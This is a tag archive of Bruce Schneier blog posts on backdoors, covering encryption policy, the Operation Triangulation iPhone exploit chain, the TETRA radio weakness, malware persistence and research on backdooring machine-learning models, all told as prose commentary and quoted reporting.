Tag Archives: backdoors

EU Court of Human Rights Rejects Encryption Backdoors

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/02/eu-court-of-human-rights-rejects-encryption-backdoors.html

The European Court of Human Rights has ruled that breaking end-to-end encryption by adding backdoors violates human rights:

Seemingly most critically, the [Russian] government told the ECHR that any intrusion on private lives resulting from decrypting messages was “necessary” to combat terrorism in a democratic society. To back up this claim, the government pointed to a 2017 terrorist attack that was “coordinated from abroad through secret chats via Telegram.” The government claimed that a second terrorist attack that year was prevented after the government discovered it was being coordinated through Telegram chats.

However, privacy advocates backed up Telegram’s claims that the messaging services couldn’t technically build a backdoor for governments without impacting all its users. They also argued that the threat of mass surveillance could be enough to infringe on human rights. The European Information Society Institute (EISI) and Privacy International told the ECHR that even if governments never used required disclosures to mass surveil citizens, it could have a chilling effect on users’ speech or prompt service providers to issue radical software updates weakening encryption for all users.

In the end, the ECHR concluded that the Telegram user’s rights had been violated, partly due to privacy advocates and international reports that corroborated Telegram’s position that complying with the FSB’s disclosure order would force changes impacting all its users.

The “confidentiality of communications is an essential element of the right to respect for private life and correspondence,” the ECHR’s ruling said. Thus, requiring messages to be decrypted by law enforcement “cannot be regarded as necessary in a democratic society.”

New iPhone Exploit Uses Four Zero-Days

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/01/new-iphone-exploit-uses-four-zero-days.html

Kaspersky researchers are detailing “an attack that over four years backdoored dozens if not thousands of iPhones, many of which belonged to employees of Moscow-based security firm Kaspersky.” It’s a zero-click exploit that makes use of four iPhone zero-days.

The most intriguing new detail is the targeting of the heretofore-unknown hardware feature, which proved to be pivotal to the Operation Triangulation campaign. A zero-day in the feature allowed the attackers to bypass advanced hardware-based memory protections designed to safeguard device system integrity even after an attacker gained the ability to tamper with memory of the underlying kernel. On most other platforms, once attackers successfully exploit a kernel vulnerability they have full control of the compromised system.

On Apple devices equipped with these protections, such attackers are still unable to perform key post-exploitation techniques such as injecting malicious code into other processes, or modifying kernel code or sensitive kernel data. This powerful protection was bypassed by exploiting a vulnerability in the secret function. The protection, which has rarely been defeated in exploits found to date, is also present in Apple’s M1 and M2 CPUs.

The details are staggering:

Here is a quick rundown of this 0-click iMessage attack, which used four zero-days and was designed to work on iOS versions up to iOS 16.2.

  • Attackers send a malicious iMessage attachment, which the application processes without showing any signs to the user.
  • This attachment exploits the remote code execution vulnerability CVE-2023-41990 in the undocumented, Apple-only ADJUST TrueType font instruction. This instruction had existed since the early nineties before a patch removed it.
  • It uses return/jump oriented programming and multiple stages written in the NSExpression/NSPredicate query language, patching the JavaScriptCore library environment to execute a privilege escalation exploit written in JavaScript.
  • This JavaScript exploit is obfuscated to make it completely unreadable and to minimize its size. Still, it has around 11,000 lines of code, which are mainly dedicated to JavaScriptCore and kernel memory parsing and manipulation.
  • It exploits the JavaScriptCore debugging feature DollarVM ($vm) to gain the ability to manipulate JavaScriptCore’s memory from the script and execute native API functions.
  • It was designed to support both old and new iPhones and included a Pointer Authentication Code (PAC) bypass for exploitation of recent models.
  • It uses the integer overflow vulnerability CVE-2023-32434 in XNU’s memory mapping syscalls (mach_make_memory_entry and vm_map) to obtain read/write access to the entire physical memory of the device at user level.
  • It uses hardware memory-mapped I/O (MMIO) registers to bypass the Page Protection Layer (PPL). This was mitigated as CVE-2023-38606.
  • After exploiting all the vulnerabilities, the JavaScript exploit can do whatever it wants to the device including running spyware, but the attackers chose to: (a) launch the IMAgent process and inject a payload that clears the exploitation artefacts from the device; (b) run a Safari process in invisible mode and forward it to a web page with the next stage.
  • The web page has a script that verifies the victim and, if the checks pass, receives the next stage: the Safari exploit.
  • The Safari exploit uses CVE-2023-32435 to execute a shellcode.
  • The shellcode executes another kernel exploit in the form of a Mach object file. It uses the same vulnerabilities: CVE-2023-32434 and CVE-2023-38606. It is also massive in terms of size and functionality, but completely different from the kernel exploit written in JavaScript. Certain parts related to exploitation of the above-mentioned vulnerabilities are all that the two share. Still, most of its code is also dedicated to parsing and manipulation of the kernel memory. It contains various post-exploitation utilities, which are mostly unused.
  • The exploit obtains root privileges and proceeds to execute other stages, which load spyware. We covered these stages in our previous posts.

This is nation-state stuff, absolutely crazy in its sophistication. Kaspersky discovered it, so there’s no speculation as to the attacker.

Bounty to Recover NIST’s Elliptic Curve Seeds

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/10/bounty-to-recover-nists-elliptic-curve-seeds.html

This is a fun challenge:

The NIST elliptic curves that power much of modern cryptography were generated in the late ’90s by hashing seeds provided by the NSA. How were the seeds generated? Rumor has it that they are in turn hashes of English sentences, but the person who picked them, Dr. Jerry Solinas, passed away in early 2023 leaving behind a cryptographic mystery, some conspiracy theories, and an historical password cracking challenge.

So there’s a $12K prize to recover the hash seeds.

Some backstory:

Some of the backstory here (it’s the funniest fucking backstory ever): it’s lately been circulating—though I think this may have been somewhat common knowledge among practitioners, though definitely not to me—that the “random” seeds for the NIST P-curves, generated in the 1990s by Jerry Solinas at NSA, were simply SHA1 hashes of some variation of the string “Give Jerry a raise”.

At the time, the “pass a string through SHA1” thing was meant to increase confidence in the curve seeds; the idea was that SHA1 would destroy any possible structure in the seed, so NSA couldn’t have selected a deliberately weak seed. Of course, NIST/NSA then set about destroying its reputation in the 2000’s, and this explanation wasn’t nearly enough to quell conspiracy theories.

But when Jerry Solinas went back to reconstruct the seeds, so NIST could demonstrate that the seeds really were benign, he found that he’d forgotten the string he used!

If you’re a true conspiracist, you’re certain nobody is going to find a string that generates any of these seeds. On the flip side, if anyone does find them, that’ll be a pretty devastating blow to the theory that the NIST P-curves were maliciously generated—even for people totally unfamiliar with basic curve math.

Note that this is not the constants used in the Dual_EC_PRNG random-number generator that the NSA backdoored. This is something different.

Signal Will Leave the UK Rather Than Add a Backdoor

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/signal-will-leave-the-uk-rather-than-add-a-backdoor.html

Totally expected, but still good to hear:

Onstage at TechCrunch Disrupt 2023, Meredith Whittaker, the president of the Signal Foundation, which maintains the nonprofit Signal messaging app, reaffirmed that Signal would leave the U.K. if the country’s recently passed Online Safety Bill forced Signal to build “backdoors” into its end-to-end encryption.

“We would leave the U.K. or any jurisdiction if it came down to the choice between backdooring our encryption and betraying the people who count on us for privacy, or leaving,” Whittaker said. “And that’s never not true.”

New Revelations from the Snowden Documents

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/new-revelations-from-the-snowden-documents.html

Jake Appelbaum’s PhD thesis contains several new revelations from the classified NSA documents provided to journalists by Edward Snowden. Nothing major, but a few more tidbits.

Kind of amazing that that all happened ten years ago. At this point, those documents are more historical than anything else.

And it’s unclear who has those archives anymore. According to Appelbaum, The Intercept destroyed their copy.

I recently published an essay about my experiences ten years ago.

Microsoft Signing Key Stolen by Chinese

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/08/microsoft-signing-key-stolen-by-chinese.html

A bunch of networks, including US Government networks, have been hacked by the Chinese. The hackers used forged authentication tokens to access user email, using a stolen Microsoft Azure account consumer signing key. Congress wants answers. The phrase “negligent security practices” is being tossed about—and with good reason. Master signing keys are not supposed to be left around, waiting to be stolen.

Actually, two things went badly wrong here. The first is that Azure accepted an expired signing key, implying a vulnerability in whatever is supposed to check key validity. The second is that this key was supposed to remain in the the system’s Hardware Security Module—and not be in software. This implies a really serious breach of good security practice. The fact that Microsoft has not been forthcoming about the details of what happened tell me that the details are really bad.

I believe this all traces back to SolarWinds. In addition to Russia inserting malware into a SolarWinds update, China used a different SolarWinds vulnerability to break into networks. We know that Russia accessed Microsoft source code in that attack. I have heard from informed government officials that China used their SolarWinds vulnerability to break into Microsoft and access source code, including Azure’s.

I think we are grossly underestimating the long-term results of the SolarWinds attacks. That backdoored update was downloaded by over 14,000 networks worldwide. Organizations patched their networks, but not before Russia—and others—used the vulnerability to enter those networks. And once someone is in a network, it’s really hard to be sure that you’ve kicked them out.

Sophisticated threat actors are realizing that stealing source code of infrastructure providers, and then combing that code for vulnerabilities, is an excellent way to break into organizations who use those infrastructure providers. Attackers like Russia and China—and presumably the US as well—are prioritizing going after those providers.

News articles.

EDITED TO ADD: Commentary:

This is from Microsoft’s explanation. The China attackers “acquired an inactive MSA consumer signing key and used it to forge authentication tokens for Azure AD enterprise and MSA consumer to access OWA and Outlook.com. All MSA keys active prior to the incident—including the actor-acquired MSA signing key—have been invalidated. Azure AD keys were not impacted. Though the key was intended only for MSA accounts, a validation issue allowed this key to be trusted for signing Azure AD tokens. The actor was able to obtain new access tokens by presenting one previously issued from this API due to a design flaw. This flaw in the GetAccessTokenForResourceAPI has since been fixed to only accept tokens issued from Azure AD or MSA respectively. The actor used these tokens to retrieve mail messages from the OWA API.”

Backdoor in TETRA Police Radios

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/07/backdoor-in-tetra-police-radios.html

Seems that there is a deliberate backdoor in the twenty-year-old TErrestrial Trunked RAdio (TETRA) standard used by police forces around the world.

The European Telecommunications Standards Institute (ETSI), an organization that standardizes technologies across the industry, first created TETRA in 1995. Since then, TETRA has been used in products, including radios, sold by Motorola, Airbus, and more. Crucially, TETRA is not open-source. Instead, it relies on what the researchers describe in their presentation slides as “secret, proprietary cryptography,” meaning it is typically difficult for outside experts to verify how secure the standard really is.

The researchers said they worked around this limitation by purchasing a TETRA-powered radio from eBay. In order to then access the cryptographic component of the radio itself, Wetzels said the team found a vulnerability in an interface of the radio.

[…]

Most interestingly is the researchers’ findings of what they describe as the backdoor in TEA1. Ordinarily, radios using TEA1 used a key of 80-bits. But Wetzels said the team found a “secret reduction step” which dramatically lowers the amount of entropy the initial key offered. An attacker who followed this step would then be able to decrypt intercepted traffic with consumer-level hardware and a cheap software defined radio dongle.

Looks like the encryption algorithm was intentionally weakened by intelligence agencies to facilitate easy eavesdropping.

Specifically on the researchers’ claims of a backdoor in TEA1, Boyer added “At this time, we would like to point out that the research findings do not relate to any backdoors. The TETRA security standards have been specified together with national security agencies and are designed for and subject to export control regulations which determine the strength of the encryption.”

And I would like to point out that that’s the very definition of a backdoor.

Why aren’t we done with secret, proprietary cryptography? It’s just not a good idea.

Details of the security analysis. Another news article.

Another Malware with Persistence

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/03/another-malware-with-persistence.html

Here’s a piece of Chinese malware that infects SonicWall security appliances and survives firmware updates.

On Thursday, security firm Mandiant published a report that said threat actors with a suspected nexus to China were engaged in a campaign to maintain long-term persistence by running malware on unpatched SonicWall SMA appliances. The campaign was notable for the ability of the malware to remain on the devices even after its firmware received new firmware.

“The attackers put significant effort into the stability and persistence of their tooling,” Mandiant researchers Daniel Lee, Stephen Eckels, and Ben Read wrote. “This allows their access to the network to persist through firmware updates and maintain a foothold on the network through the SonicWall Device.”

To achieve this persistence, the malware checks for available firmware upgrades every 10 seconds. When an update becomes available, the malware copies the archived file for backup, unzips it, mounts it, and then copies the entire package of malicious files to it. The malware also adds a backdoor root user to the mounted file. Then, the malware rezips the file so it’s ready for installation.

“The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence,” the researchers wrote.

Putting Undetectable Backdoors in Machine Learning Models

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/02/putting-undetectable-backdoors-in-machine-learning-models.html

This is really interesting research from a few months ago:

Abstract: Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. Delegation of learning has clear benefits, and at the same time raises serious concerns of trust. This work studies possible abuses of power by untrusted learners.We show how a malicious learner can plant an undetectable backdoor into a classifier. On the surface, such a backdoored classifier behaves normally, but in reality, the learner maintains a mechanism for changing the classification of any input, with only a slight perturbation. Importantly, without the appropriate “backdoor key,” the mechanism is hidden and cannot be detected by any computationally-bounded observer. We demonstrate two frameworks for planting undetectable backdoors, with incomparable guarantees.

First, we show how to plant a backdoor in any model, using digital signature schemes. The construction guarantees that given query access to the original model and the backdoored version, it is computationally infeasible to find even a single input where they differ. This property implies that the backdoored model has generalization error comparable with the original model. Moreover, even if the distinguisher can request backdoored inputs of its choice, they cannot backdoor a new input­a property we call non-replicability.

Second, we demonstrate how to insert undetectable backdoors in models trained using the Random Fourier Features (RFF) learning paradigm (Rahimi, Recht; NeurIPS 2007). In this construction, undetectability holds against powerful white-box distinguishers: given a complete description of the network and the training data, no efficient distinguisher can guess whether the model is “clean” or contains a backdoor. The backdooring algorithm executes the RFF algorithm faithfully on the given training data, tampering only with its random coins. We prove this strong guarantee under the hardness of the Continuous Learning With Errors problem (Bruna, Regev, Song, Tang; STOC 2021). We show a similar white-box undetectable backdoor for random ReLU networks based on the hardness of Sparse PCA (Berthet, Rigollet; COLT 2013).

Our construction of undetectable backdoors also sheds light on the related issue of robustness to adversarial examples. In particular, by constructing undetectable backdoor for an “adversarially-robust” learning algorithm, we can produce a classifier that is indistinguishable from a robust classifier, but where every input has an adversarial example! In this way, the existence of undetectable backdoors represent a significant theoretical roadblock to certifying adversarial robustness.

Turns out that securing ML systems is really hard.

Manipulating Weights in Face-Recognition AI Systems

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/02/manipulating-weights-in-face-recognition-ai-systems.html

Interesting research: “Facial Misrecognition Systems: Simple Weight Manipulations Force DNNs to Err Only on Specific Persons“:

Abstract: In this paper we describe how to plant novel types of backdoors in any facial recognition model based on the popular architecture of deep Siamese neural networks, by mathematically changing a small fraction of its weights (i.e., without using any additional training or optimization). These backdoors force the system to err only on specific persons which are preselected by the attacker. For example, we show how such a backdoored system can take any two images of a particular person and decide that they represent different persons (an anonymity attack), or take any two images of a particular pair of persons and decide that they represent the same person (a confusion attack), with almost no effect on the correctness of its decisions for other persons. Uniquely, we show that multiple backdoors can be independently installed by multiple attackers who may not be aware of each other’s existence with almost no interference.

We have experimentally verified the attacks on a FaceNet-based facial recognition system, which achieves SOTA accuracy on the standard LFW dataset of 99.35%. When we tried to individually anonymize ten celebrities, the network failed to recognize two of their images as being the same person in 96.97% to 98.29% of the time. When we tried to confuse between the extremely different looking Morgan Freeman and Scarlett Johansson, for example, their images were declared to be the same person in 91.51% of the time. For each type of backdoor, we sequentially installed multiple backdoors with minimal effect on the performance of each one (for example, anonymizing all ten celebrities on the same model reduced the success rate for each celebrity by no more than 0.91%). In all of our experiments, the benign accuracy of the network on other persons was degraded by no more than 0.48% (and in most cases, it remained above 99.30%).

It’s a weird attack. On the one hand, the attacker has access to the internals of the facial recognition system. On the other hand, this is a novel attack in that it manipulates internal weights to achieve a specific outcome. Given that we have no idea how those weights work, it’s an important result.

Trojaned Windows Installer Targets Ukraine

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/12/trojaned-windows-installer-targets-ukraine.html

Mandiant is reporting on a trojaned Windows installer that targets Ukrainian users. The installer was left on various torrent sites, presumably ensnaring people downloading pirated copies of the operating system:

Mandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 Operating System installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors.

One obvious solution would be for Microsoft to give the Ukrainians Windows licenses, so they don’t have to get their software from sketchy torrent sites.

Inserting a Backdoor into a Machine-Learning System

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/10/inserting-a-backdoor-into-a-machine-learning-system.html

Interesting research: “ImpNet: Imperceptible and blackbox-undetectable backdoors in compiled neural networks, by Tim Clifford, Ilia Shumailov, Yiren Zhao, Ross Anderson, and Robert Mullins:

Abstract: Early backdoor attacks against machine learning set off an arms race in attack and defence development. Defences have since appeared demonstrating some ability to detect backdoors in models or even remove them. These defences work by inspecting the training data, the model, or the integrity of the training procedure. In this work, we show that backdoors can be added during compilation, circumventing any safeguards in the data preparation and model training stages. As an illustration, the attacker can insert weight-based backdoors during the hardware compilation step that will not be detected by any training or data-preparation process. Next, we demonstrate that some backdoors, such as ImpNet, can only be reliably detected at the stage where they are inserted and removing them anywhere else presents a significant challenge. We conclude that machine-learning model security requires assurance of provenance along the entire technical pipeline, including the data, model architecture, compiler, and hardware specification.

Ross Anderson explains the significance:

The trick is for the compiler to recognise what sort of model it’s compiling—whether it’s processing images or text, for example—and then devising trigger mechanisms for such models that are sufficiently covert and general. The takeaway message is that for a machine-learning model to be trustworthy, you need to assure the provenance of the whole chain: the model itself, the software tools used to compile it, the training data, the order in which the data are batched and presented—in short, everything.

Symbiote Backdoor in Linux

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/06/symbiote-backdoor-in-linux.html

Interesting:

What makes Symbiote different from other Linux malware that we usually come across, is that it needs to infect other running processes to inflict damage on infected machines. Instead of being a standalone executable file that is run to infect a machine, it is a shared object (SO) library that is loaded into all running processes using LD_PRELOAD (T1574.006), and parasitically infects the machine. Once it has infected all the running processes, it provides the threat actor with rootkit functionality, the ability to harvest credentials, and remote access capability.

News article:

Researchers have unearthed a discovery that doesn’t occur all that often in the realm of malware: a mature, never-before-seen Linux backdoor that uses novel evasion techniques to conceal its presence on infected servers, in some cases even with a forensic investigation.

No public attribution yet.

So far, there’s no evidence of infections in the wild, only malware samples found online. It’s unlikely this malware is widely active at the moment, but with stealth this robust, how can we be sure?

New Sophisticated Malware

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/05/new-sophisticated-malware.html

Mandiant is reporting on a new botnet.

The group, which security firm Mandiant is calling UNC3524, has spent the past 18 months burrowing into victims’ networks with unusual stealth. In cases where the group is ejected, it wastes no time reinfecting the victim environment and picking up where things left off. There are many keys to its stealth, including:

  • The use of a unique backdoor Mandiant calls Quietexit, which runs on load balancers, wireless access point controllers, and other types of IoT devices that don’t support antivirus or endpoint detection. This makes detection through traditional means difficult.
  • Customized versions of the backdoor that use file names and creation dates that are similar to legitimate files used on a specific infected device.
  • A live-off-the-land approach that favors common Windows programming interfaces and tools over custom code with the goal of leaving as light a footprint as possible.
  • An unusual way a second-stage backdoor connects to attacker-controlled infrastructure by, in essence, acting as a TLS-encrypted server that proxies data through the SOCKS protocol.

[…]

Unpacking this threat group is difficult. From outward appearances, their focus on corporate transactions suggests a financial interest. But UNC3524’s high-caliber tradecraft, proficiency with sophisticated IoT botnets, and ability to remain undetected for so long suggests something more.

From Mandiant:

Throughout their operations, the threat actor demonstrated sophisticated operational security that we see only a small number of threat actors demonstrate. The threat actor evaded detection by operating from devices in the victim environment’s blind spots, including servers running uncommon versions of Linux and network appliances running opaque OSes. These devices and appliances were running versions of operating systems that were unsupported by agent-based security tools, and often had an expected level of network traffic that allowed the attackers to blend in. The threat actor’s use of the QUIETEXIT tunneler allowed them to largely live off the land, without the need to bring in additional tools, further reducing the opportunity for detection. This allowed UNC3524 to remain undetected in victim environments for, in some cases, upwards of 18 months.

Undetectable Backdoors in Machine-Learning Models

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/04/undetectable-backdoors-in-machine-learning-models.html

New paper: “Planting Undetectable Backdoors in Machine Learning Models“:

Abstract: Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. We show how a malicious learner can plant an undetectable backdoor into a classifier. On the surface, such a backdoored classifier behaves normally, but in reality, the learner maintains a mechanism for changing the classification of any input, with only a slight perturbation. Importantly, without the appropriate “backdoor key”, the mechanism is hidden and cannot be detected by any computationally-bounded observer. We demonstrate two frameworks for planting undetectable backdoors, with incomparable guarantees.

First, we show how to plant a backdoor in any model, using digital signature schemes. The construction guarantees that given black-box access to the original model and the backdoored version, it is computationally infeasible to find even a single input where they differ. This property implies that the backdoored model has generalization error comparable with the original model. Second, we demonstrate how to insert undetectable backdoors in models trained using the Random Fourier Features (RFF) learning paradigm or in Random ReLU networks. In this construction, undetectability holds against powerful white-box distinguishers: given a complete description of the network and the training data, no efficient distinguisher can guess whether the model is “clean” or contains a backdoor.

Our construction of undetectable backdoors also sheds light on the related issue of robustness to adversarial examples. In particular, our construction can produce a classifier that is indistinguishable from an “adversarially robust” classifier, but where every input has an adversarial example! In summary, the existence of undetectable backdoors represent a significant theoretical roadblock to certifying adversarial robustness.

EDITED TO ADD (4/20): Cory Doctorow wrote about this as well.

New German Government is Pro-Encryption and Anti-Backdoors

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/12/new-german-government-is-pro-encryption-and-anti-backdoors.html

I hope this is true:

According to Jens Zimmermann, the German coalition negotiations had made it “quite clear” that the incoming government of the Social Democrats (SPD), the Greens and the business-friendly liberal FDP would reject “the weakening of encryption, which is being attempted under the guise of the fight against child abuse” by the coalition partners.

Such regulations, which are already enshrined in the interim solution of the ePrivacy Regulation, for example, “diametrically contradict the character of the coalition agreement” because secure end-to-end encryption is guaranteed there, Zimmermann said.

Introducing backdoors would undermine this goal of the coalition agreement, he added.

I have written about this.

Security Risks of Client-Side Scanning

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/10/security-risks-of-client-side-scanning.html

Even before Apple made its announcement, law enforcement shifted their battle for backdoors to client-side scanning. The idea is that they wouldn’t touch the cryptography, but instead eavesdrop on communications and systems before encryption or after decryption. It’s not a cryptographic backdoor, but it’s still a backdoor — and brings with it all the insecurities of a backdoor.

I’m part of a group of cryptographers that has just published a paper discussing the security risks of such a system. (It’s substantially the same group that wrote a similar paper about key escrow in 1997, and other “exceptional access” proposals in 2015. We seem to have to do this every decade or so.) In our paper, we examine both the efficacy of such a system and its potential security failures, and conclude that it’s a really bad idea.

We had been working on the paper well before Apple’s announcement. And while we do talk about Apple’s system, our focus is really on the idea in general.

Ross Anderson wrote a blog post on the paper. (It’s always great when Ross writes something. It means I don’t have to.) So did Susan Landau. And there’s press coverage in the New York Times, the Guardian, Computer Weekly, the Financial Times, Forbes, El Pais (English translation), NRK (English translation), and — this is the best article of them all — the Register. See also this analysis of the law and politics of client-side scanning from last year.

More on Apple’s iPhone Backdoor

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/08/more-on-apples-iphone-backdoor.html

In this post, I’ll collect links on Apple’s iPhone backdoor for scanning CSAM images. Previous links are here and here.

Apple says that hash collisions in its CSAM detection system were expected, and not a concern. I’m not convinced that this secondary system was originally part of the design, since it wasn’t discussed in the original specification.

Good op-ed from a group of Princeton researchers who developed a similar system:

Our system could be easily repurposed for surveillance and censorship. The design wasn’t restricted to a specific category of content; a service could simply swap in any content-matching database, and the person using that service would be none the wiser.

EDITED TO ADD (8/30): Good essays by Matthew Green and Alex Stamos, Ross Anderson, Edward Snowden, and Susan Landau. And also Kurt Opsahl.

Apple’s NeuralHash Algorithm Has Been Reverse-Engineered

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/08/apples-neuralhash-algorithm-has-been-reverse-engineered.html

Apple’s NeuralHash algorithm — the one it’s using for client-side scanning on the iPhone — has been reverse-engineered.

Turns out it was already in iOS 14.3, and someone noticed:

Early tests show that it can tolerate image resizing and compression, but not cropping or rotations.

We also have the first collision: two images that hash to the same value.

The next step is to generate innocuous images that NeuralHash classifies as prohibited content.

This was a bad idea from the start, and Apple never seemed to consider the adversarial context of the system as a whole, and not just the cryptography.